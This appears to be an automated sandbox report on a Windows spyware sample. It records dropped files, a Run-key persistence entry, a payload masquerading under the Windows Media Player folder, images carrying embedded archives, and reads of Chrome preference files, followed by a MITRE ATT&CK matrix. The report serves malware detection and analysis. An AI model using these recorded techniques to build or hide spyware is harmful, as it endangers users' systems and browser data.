Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\output[1].png, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: classification engineClassification label: mal80.troj.spyw.winEXE@8/9@4/4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC05D60 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,Sleep,SleepEx,_invalid_parameter_noinfo_noreturn,0_2_00007FF7ABC05D60
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC07C50 __std_fs_code_page,__std_fs_code_page,__std_fs_code_page,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7ABC07C50
Source: C:\Users\user\Desktop\file.exeFile created: C:\Program Files\Google\Chrome\ExtensionsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\output[1].pngJump to behavior
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: file.exeReversingLabs: Detection: 63%
Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: unknownProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: unknownProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"Jump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: samlib.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: samlib.dllJump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Google\Chrome\ExtensionsJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzipJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\graphJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\graph\graph.exeJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzipJump to behavior
Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: file.exe, 00000000.00000003.1441801975.000002321A614000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000004.00000000.1442015402.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000002.2586599577.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000000.1465637036.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000002.2586631310.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000000.1562238988.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000008.00000000.1642942576.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000008.00000002.2586573272.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe.0.dr
Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: file.exe
Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: file.exe
Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: file.exe, 00000000.00000003.1441801975.000002321A614000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000004.00000002.2586789149.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000004.00000000.1442015402.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000002.2586599577.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000000.1465637036.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000002.2586631310.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000000.1562238988.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000008.00000000.1642942576.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000008.00000002.2586573272.00007FF6A2319000.00000002.00000001.01000000.00000007.sdmp, graph.exe.0.dr
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].pngJump to behavior
Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].jsonJump to behavior
Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].jsonJump to behavior
Source: C:\Users\user\Desktop\file.exeFile created: C:\Program Files\Windows Media Player\graph\graph.exeJump to dropped file
Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GraphJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GraphJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run GraphJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run GraphJump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exeWindow / User API: threadDelayed 5920Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exeWindow / User API: threadDelayed 1038Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exeWindow / User API: threadDelayed 813Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exeWindow / User API: threadDelayed 402Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exeWindow / User API: threadDelayed 4634Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exeWindow / User API: threadDelayed 3152Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exeAPI coverage: 3.8 %
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7748Thread sleep count: 5920 > 30Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7748Thread sleep time: -5920000s >= -30000sJump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7748Thread sleep count: 1038 > 30Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7748Thread sleep time: -1038000s >= -30000sJump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7884Thread sleep count: 813 > 30Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7884Thread sleep time: -813000s >= -30000sJump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7884Thread sleep count: 402 > 30Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7884Thread sleep time: -402000s >= -30000sJump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 8144Thread sleep count: 4634 > 30Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 8144Thread sleep time: -4634000s >= -30000sJump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 8188Thread sleep count: 3152 > 30Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 8188Thread sleep time: -3152000s >= -30000sJump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exeLast function: Thread delayed
Source: C:\Program Files\Windows Media Player\graph\graph.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC09B00 GetEnvironmentVariableW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7ABC09B00
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC3E440 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,0_2_00007FF7ABC3E440
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC3E3CC FindClose,FindFirstFileExW,GetLastError,0_2_00007FF7ABC3E3CC
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC6070C FindFirstFileExW,0_2_00007FF7ABC6070C
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF6A22FCD08 FindClose,FindFirstFileExW,GetLastError,4_2_00007FF6A22FCD08
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF6A230FA54 FindFirstFileExW,4_2_00007FF6A230FA54
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF6A22FCD7C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,4_2_00007FF6A22FCD7C
Source: file.exe, 00000000.00000003.1463728013.0000023218955000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.0000023218955000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441377935.0000023218959000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D102E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1464989617.0000012D10373000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D10374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1490397342.00000232188D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
Source: file.exe, 00000000.00000003.1463728013.0000023218955000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.0000023218955000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441377935.0000023218959000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWd
Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC4CA44 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7ABC4CA44
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC42348 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_00007FF7ABC42348
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC61EF8 GetProcessHeap,0_2_00007FF7ABC61EF8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC4CA44 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7ABC4CA44
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC438CC SetUnhandledExceptionFilter,0_2_00007FF7ABC438CC
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC42798 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7ABC42798
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC436EC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7ABC436EC
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF6A22FE3EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF6A22FE3EC
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF6A22FE8B0 SetUnhandledExceptionFilter,4_2_00007FF6A22FE8B0
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF6A230364C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF6A230364C
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF6A22FE6D0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF6A22FE6D0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC68D10 cpuid 0_2_00007FF7ABC68D10
Source: C:\Users\user\Desktop\file.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00007FF7ABC63D04
Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00007FF7ABC64060
Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoEx,FormatMessageA,0_2_00007FF7ABC3DF9C
Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00007FF7ABC58D4C
Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00007FF7ABC64410
Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF7ABC641C8
Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00007FF7ABC64130
Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00007FF7ABC58874
Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF7ABC6474C
Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00007FF7ABC64618
Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00007FF7ABC64568
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: EnumSystemLocalesW,4_2_00007FF6A2313370
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_00007FF6A2313408
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: EnumSystemLocalesW,4_2_00007FF6A230A4A8
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00007FF6A231398C
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: EnumSystemLocalesW,4_2_00007FF6A23132A0
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: GetLocaleInfoEx,FormatMessageA,4_2_00007FF6A22FAF50
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00007FF6A23137A8
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,4_2_00007FF6A2312F44
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: GetLocaleInfoW,4_2_00007FF6A230A83C
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: GetLocaleInfoW,4_2_00007FF6A2313858
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: GetLocaleInfoW,4_2_00007FF6A2313650
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC43938 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7ABC43938
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC5D2C8 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF7ABC5D2C8

Stealing of Sensitive Information

barindex
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferencesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Scheduled Task/Job
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
1
OS Credential Dumping
2
System Time Discovery
Remote Services1
Archive Collected Data
1
Web Service
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scheduled Task/Job
1
Process Injection
1
Obfuscated Files or Information
LSASS Memory1
System Network Connections Discovery
Remote Desktop Protocol1
Data from Local System
2
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Registry Run Keys / Startup Folder
1
Scheduled Task/Job
1
DLL Side-Loading
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive11
Encrypted Channel
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Registry Run Keys / Startup Folder
1
File Deletion
NTDS22
System Information Discovery
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script113
Masquerading
LSA Secrets1
Network Share Discovery
SSHKeylogging3
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Virtualization/Sandbox Evasion
Cached Domain Credentials31
Security Software Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Process Injection
DCSync1
Virtualization/Sandbox Evasion
